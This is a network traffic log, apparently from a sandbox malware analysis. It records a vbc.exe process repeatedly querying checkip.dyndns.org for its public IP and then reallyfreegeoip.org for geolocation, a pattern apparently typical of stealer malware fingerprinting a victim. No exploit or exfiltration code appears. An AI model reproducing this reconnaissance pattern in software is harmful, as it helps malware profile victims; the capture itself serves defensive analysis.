Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49707	158.101.44.242	80	7192	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 15:03:39.848668098 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 15:03:40.415719032 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 14:03:40 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 9230e4f4299ae715b9ee3a3f74f70b55 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 10, 2025 15:03:40.441118956 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 10, 2025 15:03:40.605098963 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 14:03:40 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 0d8d7f9b5112d0789ca1606f0ffdaa08 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 10, 2025 15:03:41.654695034 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 10, 2025 15:03:41.822068930 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 14:03:41 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: b5a85c97de15cf6b9db734a9f502936f Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49711	158.101.44.242	80	7192	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 15:03:42.460624933 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 10, 2025 15:03:43.024322033 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 14:03:42 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 20af9c0df3ec73bac1b42a44a88139a8 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49714	158.101.44.242	80	7192	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 15:03:43.670224905 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 10, 2025 15:03:44.233684063 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 14:03:44 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 2cdc990683ee79ba7c0e2c195e4efc3b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 10, 2025 15:03:44.450639963 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 14:03:44 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 2cdc990683ee79ba7c0e2c195e4efc3b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49715	158.101.44.242	80	7584	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 15:03:44.148478985 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 15:03:44.736049891 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 14:03:44 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 567d4941c96ecbcdfacc72c193cd9396 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 10, 2025 15:03:44.741085052 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 10, 2025 15:03:44.899827957 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 14:03:44 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 07e2e9e1ed0ce87c0743506bc034879b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 10, 2025 15:03:45.802587986 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 10, 2025 15:03:46.092962980 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 14:03:46 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 886e586b53cb774e2f7ebf4cea838aec Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49717	158.101.44.242	80	7192	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 15:03:44.851979017 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 15:03:45.647352934 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 14:03:45 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 3acf6b7d380ffd1eaf863e6c0d514c73 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49721	158.101.44.242	80	7192	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 15:03:46.335643053 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 15:03:47.195346117 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 14:03:47 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 1569d9330f1ec85c32893932b12a19fd Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49722	158.101.44.242	80	7584	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 15:03:46.735743999 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 10, 2025 15:03:47.302692890 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 14:03:47 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 0afe425879722d08b66bc9b04293f072 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49725	158.101.44.242	80	7192	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 15:03:47.812550068 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 15:03:48.811177969 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 14:03:48 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 5dab85c6cd3af9b579969b720834c1e1 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49726	158.101.44.242	80	7584	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 15:03:47.935044050 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 10, 2025 15:03:48.515544891 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 14:03:48 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: e637712b3ff727d3f4b3cccf71df7863 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49729	158.101.44.242	80	7584	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 15:03:49.172792912 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 15:03:50.337177038 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 14:03:50 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 9eb8a4e3ca6207721d2615eb910ecfac Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49730	158.101.44.242	80	7192	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 15:03:49.543309927 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 15:03:50.118618965 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 14:03:50 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: f343dc911d19f9a11c099ed7f9e9bedc Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49733	158.101.44.242	80	7192	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 15:03:50.769881010 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 15:03:51.882884979 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 14:03:51 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 31e885e0edfbbb4154a9a1b0d8de860b Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49734	158.101.44.242	80	7584	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 15:03:50.929568052 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 15:03:52.007836103 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 14:03:51 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 03ceb2be1ac3dd3e0f98167b20dbcec3 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49739	158.101.44.242	80	7584	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 15:03:52.808335066 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 15:03:53.985341072 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 14:03:53 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: ca39658ee1837f7b7a080c19ac9506f0 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49745	158.101.44.242	80	7584	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 15:03:54.597693920 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 15:03:55.182022095 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 14:03:55 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 3c86bd3b24237a112c223b3ff6ea44a1 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49749	158.101.44.242	80	7584	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 15:03:56.291120052 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 15:03:56.881597996 CET	321	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 14:03:56 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: 1ccb29392d03bd742679b0af40730ba4 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49708	104.21.96.1	443	7192	C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 14:03:41 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-10 14:03:41 UTC	855	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 14:03:41 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 1832610 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6tqk3iro1JORERHjfq5bAaxJhYIb8d%2FlEiE81WRfKosnDijX0t13YLOZQvB5YDyed0RTAQMOJ4g2X%2FYfG7OE1DjRxxnKdAGrUeAfhN7sGaEqV02l%2BWMvO8zKn4OLF6m4Dc9XgWjz"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffd3640aa0642c0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1760&min_rtt=1759&rtt_var=663&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1645997&cwnd=212&unsent_bytes=0&cid=b5f141a9e55b5b10&ts=445&x=0"
2025-01-10 14:03:41 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New 